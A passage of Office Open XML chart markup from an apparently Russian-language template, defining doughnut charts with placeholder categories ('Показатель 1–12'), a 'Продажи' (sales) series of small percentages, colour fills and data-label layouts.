              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="0.10223232975814367"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{0000000C-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:txPr>
              <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="38100" tIns="19050" rIns="38100" bIns="19050" anchor="ctr" anchorCtr="0">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pP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Лист1!$A$2:$A$13</c:f>
              <c:strCache>
                <c:ptCount val="12"/>
                <c:pt idx="0">
                  <c:v>Показатель 1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Показатель 2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Показатель 3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Показатель 4</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Показатель 5</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Показатель 6</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Показатель 7</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Показатель 8</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Показатель  9</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Показатель 10</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Показатель 11</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>Показатель 12</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$B$2:$B$13</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="12"/>
                <c:pt idx="0">
                  <c:v>0.05</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.03</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.01</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.02</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.05</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.04</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0.06</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>7.0000000000000007E-2</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0.03</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0.02</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>0.06</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>0.05</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-BA82-4701-9528-F1C2935FDDAB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
          <c:showLeaderLines val="0"/>
        </c:dLbls>
        <c:firstSliceAng val="0"/>
        <c:holeSize val="90"/>
      </c:doughnutChart>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="l"/>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="3.3988231614986306E-2"/>
          <c:y val="0.11087967000831135"/>
          <c:w val="0.48273612791430892"/>
          <c:h val="0.7400034425016044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911794727721994"/>
          <c:y val="9.2104904865294004E-2"/>
          <c:w val="0.36600676304040602"/>
          <c:h val="0.84761384425253383"/>
        </c:manualLayout>
      </c:layout>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Продажи</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200" cap="rnd">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000001-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000003-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000005-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000007-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000009-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="5"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000B-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="6"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000D-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="7"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000F-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="8"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000011-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="9"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000013-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="10"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000015-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="11"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000017-3A0D-4965-AD72-C8CBD408070D}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="1.523888561559837E-2"/>
                  <c:y val="-6.6626645711874613E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="0.1725346601236169"/>
                      <c:h val="0.10283811523786612"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000001-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="1"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="2.5720167588796739E-2"/>
                  <c:y val="-4.441763889856936E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="9.9924801169697236E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000003-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="2"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="2.7400000711967121E-2"/>
                  <c:y val="-2.8554401643007557E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="3.2794931570790387E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000005-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="3"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="3.2373147809479044E-2"/>
                  <c:y val="-1.2690664750057704E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:spPr>
                <a:noFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </c:spPr>
              <c:txPr>
                <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="38100" tIns="19050" rIns="38100" bIns="19050" anchor="ctr" anchorCtr="0">
                  <a:noAutofit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="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2.8684939554530782E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000007-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="4"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="1.1823204659915229E-2"/>
                  <c:y val="1.2490934692505382E-7"/>
                </c:manualLayout>
              </c:layout>
              <c:spPr>
                <a:noFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </c:spPr>
              <c:txPr>
                <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="38100" tIns="19050" rIns="38100" bIns="19050" anchor="ctr" anchorCtr="0">
                  <a:noAutofit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="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7.5264849072139609E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000009-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="5"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="3.2992596203019774E-2"/>
                  <c:y val="4.7590586132114615E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="4.9234899635828805E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{0000000B-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="6"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="1.3474773963658752E-2"/>
                  <c:y val="3.7477175939561749E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:spPr>
                <a:noFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </c:spPr>
              <c:txPr>
                <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="38100" tIns="19050" rIns="38100" bIns="19050" anchor="b" anchorCtr="0">
                  <a:noAutofit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pP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0677478786346324"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{0000000D-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="7"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-2.0549906144394916E-2"/>
                  <c:y val="7.6144862865775167E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:spPr>
                <a:xfrm>
                  <a:off x="5648343" y="3150904"/>
                  <a:ext cx="1599412" cy="411651"/>
                </a:xfrm>
                <a:noFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </c:spPr>
              <c:txPr>
                <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="38100" tIns="19050" rIns="38100" bIns="19050" anchor="ctr" anchorCtr="0">
                  <a:noAutofit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pP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9240"/>
                        <a:gd name="adj2" fmla="val 26925"/>
                      </a:avLst>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </c15:spPr>
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="0.10540479052471005"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{0000000F-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="8"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-3.4137259461418663E-2"/>
                  <c:y val="4.1245191302412276E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="6.1908885252582715E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000011-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="9"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-3.5619876870680127E-2"/>
                  <c:y val="1.2490934704138472E-7"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="8.5792361693105265E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000013-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="10"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-2.8769890176914222E-2"/>
                  <c:y val="-4.1244941483718219E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="8.0312372338092464E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000015-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="11"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-1.2329922111875708E-2"/>
                  <c:y val="-6.6626520802527567E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="0.10223232975814367"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000017-3A0D-4965-AD72-C8CBD408070D}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:spPr>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:txPr>
              <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="38100" tIns="19050" rIns="38100" bIns="19050" anchor="ctr" anchorCtr="0">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="1197" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>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Лист1!$A$2:$A$13</c:f>
              <c:strCache>
                <c:ptCount val="12"/>
                <c:pt idx="0">
                  <c:v>Показатель 1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Показатель 2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Показатель 3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Показатель 4</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Показатель 5</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Показатель 6</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>Показатель 7</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>Показатель 8</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>Показатель  9</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>Показатель 10</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>Показатель 11</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>Показатель 12</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$B$2:$B$13</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="12"/>
                <c:pt idx="0">
                  <c:v>0.05</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.03</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.01</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.02</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.05</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.04</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0.06</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>7.0000000000000007E-2</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0.03</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0.02</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>0.06</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>0.05</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000018-3A0D-4965-AD72-C8CBD408070D}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>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Лист1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="38100" cap="rnd">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Q1 2020</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$B$2:$B$4</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.11</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
